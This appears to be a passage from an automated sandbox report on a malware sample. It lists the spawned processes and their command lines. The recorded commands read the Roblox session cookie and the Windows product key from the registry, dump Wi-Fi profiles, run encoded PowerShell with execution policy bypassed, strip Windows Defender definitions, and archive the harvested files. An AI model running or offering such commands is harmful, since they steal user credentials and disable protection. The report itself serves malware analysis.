                                                          Commandline:tree /A /F
                                                          Imagebase:0x7ff6ec980000
                                                          File size:20'992 bytes
                                                          MD5 hash:9EB969EF56718A6243BF60350CD065F0
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:32
                                                          Start time:19:36:14
                                                          Start date:22/05/2024
                                                          Path:C:\Windows\System32\wbem\WMIC.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
                                                          Imagebase:0x7ff748a90000
                                                          File size:576'000 bytes
                                                          MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:33
                                                          Start time:19:36:14
                                                          Start date:22/05/2024
                                                          Path:C:\Windows\System32\systeminfo.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:systeminfo
                                                          Imagebase:0x7ff6fbb50000
                                                          File size:110'080 bytes
                                                          MD5 hash:EE309A9C61511E907D87B10EF226FDCD
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:34
                                                          Start time:19:36:14
                                                          Start date:22/05/2024
                                                          Path:C:\Windows\System32\netsh.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:netsh wlan show profile
                                                          Imagebase:0x7ff755090000
                                                          File size:96'768 bytes
                                                          MD5 hash:6F1E6DD688818BC3D1391D0CC7D597EB
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:35
                                                          Start time:19:36:14
                                                          Start date:22/05/2024
                                                          Path:C:\Windows\System32\tasklist.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:tasklist /FO LIST
                                                          Imagebase:0x7ff6776c0000
                                                          File size:106'496 bytes
                                                          MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:36
                                                          Start time:19:36:15
                                                          Start date:22/05/2024
                                                          Path:C:\Windows\System32\cmd.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand 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"
                                                          Imagebase:0x7ff629a10000
                                                          File size:289'792 bytes
                                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:38
                                                          Start time:19:36:17
                                                          Start date:22/05/2024
                                                          Path:C:\Windows\System32\cmd.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\cmd.exe /c "getmac"
                                                          Imagebase:0x7ff629a10000
                                                          File size:289'792 bytes
                                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:39
                                                          Start time:19:36:17
                                                          Start date:22/05/2024
                                                          Path:C:\Windows\System32\cmd.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                          Imagebase:0x7ff629a10000
                                                          File size:289'792 bytes
                                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:40
                                                          Start time:19:36:17
                                                          Start date:22/05/2024
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff70f010000
                                                          File size:862'208 bytes
                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:41
                                                          Start time:19:36:17
                                                          Start date:22/05/2024
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff70f010000
                                                          File size:862'208 bytes
                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:42
                                                          Start time:19:36:17
                                                          Start date:22/05/2024
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff70f010000
                                                          File size:862'208 bytes
                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:43
                                                          Start time:19:36:17
                                                          Start date:22/05/2024
                                                          Path:C:\Windows\System32\getmac.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:getmac
                                                          Imagebase:0x7ff7be5d0000
                                                          File size:90'112 bytes
                                                          MD5 hash:7D4B72DFF5B8E98DD1351A401E402C33
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:44
                                                          Start time:19:36:17
                                                          Start date:22/05/2024
                                                          Path:C:\Windows\System32\tree.com
                                                          Wow64 process (32bit):false
                                                          Commandline:tree /A /F
                                                          Imagebase:0x7ff6ec980000
                                                          File size:20'992 bytes
                                                          MD5 hash:9EB969EF56718A6243BF60350CD065F0
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:45
                                                          Start time:19:36:17
                                                          Start date:22/05/2024
                                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand 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
                                                          Imagebase:0x7ff760310000
                                                          File size:452'608 bytes
                                                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:46
                                                          Start time:19:36:18
                                                          Start date:22/05/2024
                                                          Path:C:\Windows\System32\cmd.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                          Imagebase:0x7ff629a10000
                                                          File size:289'792 bytes
                                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:47
                                                          Start time:19:36:18
                                                          Start date:22/05/2024
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff70f010000
                                                          File size:862'208 bytes
                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:48
                                                          Start time:19:36:18
                                                          Start date:22/05/2024
                                                          Path:C:\Windows\System32\tree.com
                                                          Wow64 process (32bit):false
                                                          Commandline:tree /A /F
                                                          Imagebase:0x7ff6ec980000
                                                          File size:20'992 bytes
                                                          MD5 hash:9EB969EF56718A6243BF60350CD065F0
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:49
                                                          Start time:19:36:19
                                                          Start date:22/05/2024
                                                          Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\c3m2uwl3\c3m2uwl3.cmdline"
                                                          Imagebase:0x7ff7584b0000
                                                          File size:2'759'232 bytes
                                                          MD5 hash:F65B029562077B648A6A5F6A1AA76A66
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:50
                                                          Start time:19:36:19
                                                          Start date:22/05/2024
                                                          Path:C:\Windows\System32\cmd.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                          Imagebase:0x7ff629a10000
                                                          File size:289'792 bytes
                                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:51
                                                          Start time:19:36:19
                                                          Start date:22/05/2024
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff70f010000
                                                          File size:862'208 bytes
                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:52
                                                          Start time:19:36:19
                                                          Start date:22/05/2024
                                                          Path:C:\Windows\System32\tree.com
                                                          Wow64 process (32bit):false
                                                          Commandline:tree /A /F
                                                          Imagebase:0x7ff6ec980000
                                                          File size:20'992 bytes
                                                          MD5 hash:9EB969EF56718A6243BF60350CD065F0
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:53
                                                          Start time:19:36:19
                                                          Start date:22/05/2024
                                                          Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES3733.tmp" "c:\Users\user\AppData\Local\Temp\c3m2uwl3\CSC33F8CF1FA9DB4434A25723BA384E2070.TMP"
                                                          Imagebase:0x7ff6e0520000
                                                          File size:52'744 bytes
                                                          MD5 hash:C877CBB966EA5939AA2A17B6A5160950
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:54
                                                          Start time:19:36:19
                                                          Start date:22/05/2024
                                                          Path:C:\Windows\System32\cmd.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                          Imagebase:0x7ff629a10000
                                                          File size:289'792 bytes
                                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:55
                                                          Start time:19:36:19
                                                          Start date:22/05/2024
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff70f010000
                                                          File size:862'208 bytes
                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:56
                                                          Start time:19:36:19
                                                          Start date:22/05/2024
                                                          Path:C:\Windows\System32\tree.com
                                                          Wow64 process (32bit):false
                                                          Commandline:tree /A /F
                                                          Imagebase:0x7ff6ec980000
                                                          File size:20'992 bytes
                                                          MD5 hash:9EB969EF56718A6243BF60350CD065F0
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:57
                                                          Start time:19:36:20
                                                          Start date:22/05/2024
                                                          Path:C:\Windows\System32\cmd.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                          Imagebase:0x7ff629a10000
                                                          File size:289'792 bytes
                                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:58
                                                          Start time:19:36:21
                                                          Start date:22/05/2024
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff70f010000
                                                          File size:862'208 bytes
                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:60
                                                          Start time:19:36:24
                                                          Start date:22/05/2024
                                                          Path:C:\Windows\System32\tree.com
                                                          Wow64 process (32bit):false
                                                          Commandline:tree /A /F
                                                          Imagebase:0x7ff6ec980000
                                                          File size:20'992 bytes
                                                          MD5 hash:9EB969EF56718A6243BF60350CD065F0
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:61
                                                          Start time:19:36:24
                                                          Start date:22/05/2024
                                                          Path:C:\Windows\System32\cmd.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
                                                          Imagebase:0x7ff629a10000
                                                          File size:289'792 bytes
                                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:62
                                                          Start time:19:36:24
                                                          Start date:22/05/2024
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff70f010000
                                                          File size:862'208 bytes
                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:63
                                                          Start time:19:36:24
                                                          Start date:22/05/2024
                                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                                                          Imagebase:0x7ff760310000
                                                          File size:452'608 bytes
                                                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:64
                                                          Start time:19:36:26
                                                          Start date:22/05/2024
                                                          Path:C:\Windows\System32\cmd.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
                                                          Imagebase:0x7ff629a10000
                                                          File size:289'792 bytes
                                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:65
                                                          Start time:19:36:26
                                                          Start date:22/05/2024
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff70f010000
                                                          File size:862'208 bytes
                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:66
                                                          Start time:19:36:27
                                                          Start date:22/05/2024
                                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                                                          Imagebase:0x7ff760310000
                                                          File size:452'608 bytes
                                                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:69
                                                          Start time:19:36:32
                                                          Start date:22/05/2024
                                                          Path:C:\Program Files\Windows Defender\MpCmdRun.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:"C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
                                                          Imagebase:0x7ff60cae0000
                                                          File size:468'120 bytes
                                                          MD5 hash:B3676839B2EE96983F9ED735CD044159
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:70
                                                          Start time:19:36:37
                                                          Start date:22/05/2024
                                                          Path:C:\Windows\System32\cmd.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\cmd.exe /c "C:\Users\user\AppData\Local\Temp\_MEI76002\rar.exe a -r -hp"123" "C:\Users\user\AppData\Local\Temp\R9FJX.zip" *"
                                                          Imagebase:0x7ff629a10000
                                                          File size:289'792 bytes
                                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:71
                                                          Start time:19:36:37
                                                          Start date:22/05/2024
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff70f010000
                                                          File size:862'208 bytes
                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:72
                                                          Start time:19:36:37
                                                          Start date:22/05/2024
                                                          Path:C:\Users\user\AppData\Local\Temp\_MEI76002\rar.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Users\user\AppData\Local\Temp\_MEI76002\rar.exe a -r -hp"123" "C:\Users\user\AppData\Local\Temp\R9FJX.zip" *
                                                          Imagebase:0x7ff71d2b0000
                                                          File size:630'736 bytes
                                                          MD5 hash:9C223575AE5B9544BC3D69AC6364F75E
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Antivirus matches:
                                                          • Detection: 0%, ReversingLabs
                                                          Has exited:true

                                                          Target ID:73
                                                          Start time:19:36:39
                                                          Start date:22/05/2024
                                                          Path:C:\Windows\System32\cmd.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\cmd.exe /c "wmic os get Caption"
                                                          Imagebase:0x7ff629a10000
                                                          File size:289'792 bytes
                                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:74
                                                          Start time:19:36:39
                                                          Start date:22/05/2024
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff70f010000
                                                          File size:862'208 bytes
                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:75
                                                          Start time:19:36:39
                                                          Start date:22/05/2024
                                                          Path:C:\Windows\System32\wbem\WMIC.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:wmic os get Caption
                                                          Imagebase:0x7ff748a90000
                                                          File size:576'000 bytes
                                                          MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:76
                                                          Start time:19:36:42
                                                          Start date:22/05/2024
                                                          Path:C:\Windows\System32\cmd.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
                                                          Imagebase:0x7ff629a10000
                                                          File size:289'792 bytes
                                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:77
                                                          Start time:19:36:42
                                                          Start date:22/05/2024
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff70f010000
                                                          File size:862'208 bytes
                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:78
                                                          Start time:19:36:42
                                                          Start date:22/05/2024
                                                          Path:C:\Windows\System32\wbem\WMIC.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:wmic computersystem get totalphysicalmemory
                                                          Imagebase:0x7ff748a90000
                                                          File size:576'000 bytes
                                                          MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:79
                                                          Start time:19:36:43
                                                          Start date:22/05/2024
                                                          Path:C:\Windows\System32\cmd.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
                                                          Imagebase:0x7ff629a10000
                                                          File size:289'792 bytes
                                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:80
                                                          Start time:19:36:43
                                                          Start date:22/05/2024
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff70f010000
                                                          File size:862'208 bytes
                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:81
                                                          Start time:19:36:43
                                                          Start date:22/05/2024
                                                          Path:C:\Windows\System32\wbem\WMIC.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:wmic csproduct get uuid
                                                          Imagebase:0x7ff748a90000
                                                          File size:576'000 bytes
                                                          MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:82
                                                          Start time:19:36:44
                                                          Start date:22/05/2024
                                                          Path:C:\Windows\System32\cmd.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
                                                          Imagebase:0x7ff629a10000
                                                          File size:289'792 bytes
                                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:83
                                                          Start time:19:36:44
                                                          Start date:22/05/2024
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff70f010000
                                                          File size:862'208 bytes
                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:84
                                                          Start time:19:36:44
                                                          Start date:22/05/2024
                                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
                                                          Imagebase:0x7ff760310000
                                                          File size:452'608 bytes
                                                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:85
                                                          Start time:19:36:45
                                                          Start date:22/05/2024
                                                          Path:C:\Windows\System32\cmd.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
                                                          Imagebase:0x7ff629a10000
                                                          File size:289'792 bytes
                                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:86
                                                          Start time:19:36:45
                                                          Start date:22/05/2024
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff70f010000
                                                          File size:862'208 bytes
                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:87
                                                          Start time:19:36:45
                                                          Start date:22/05/2024
                                                          Path:C:\Windows\System32\wbem\WMIC.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:wmic path win32_VideoController get name
                                                          Imagebase:0x7ff748a90000
                                                          File size:576'000 bytes
                                                          MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:88
                                                          Start time:19:36:46
                                                          Start date:22/05/2024
                                                          Path:C:\Windows\System32\cmd.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
                                                          Imagebase:0x7ff629a10000
                                                          File size:289'792 bytes
                                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:89
                                                          Start time:19:36:46
                                                          Start date:22/05/2024
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff70f010000
                                                          File size:862'208 bytes
                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:90
                                                          Start time:19:36:46
                                                          Start date:22/05/2024
                                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
                                                          Imagebase:0x7ff760310000
                                                          File size:452'608 bytes
                                                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true


                                                            Execution Graph

                                                            Execution Coverage:9.7%
                                                            Dynamic/Decrypted Code Coverage:0%
                                                            Signature Coverage:14.7%
                                                            Total number of Nodes:2000
                                                            Total number of Limit Nodes:43
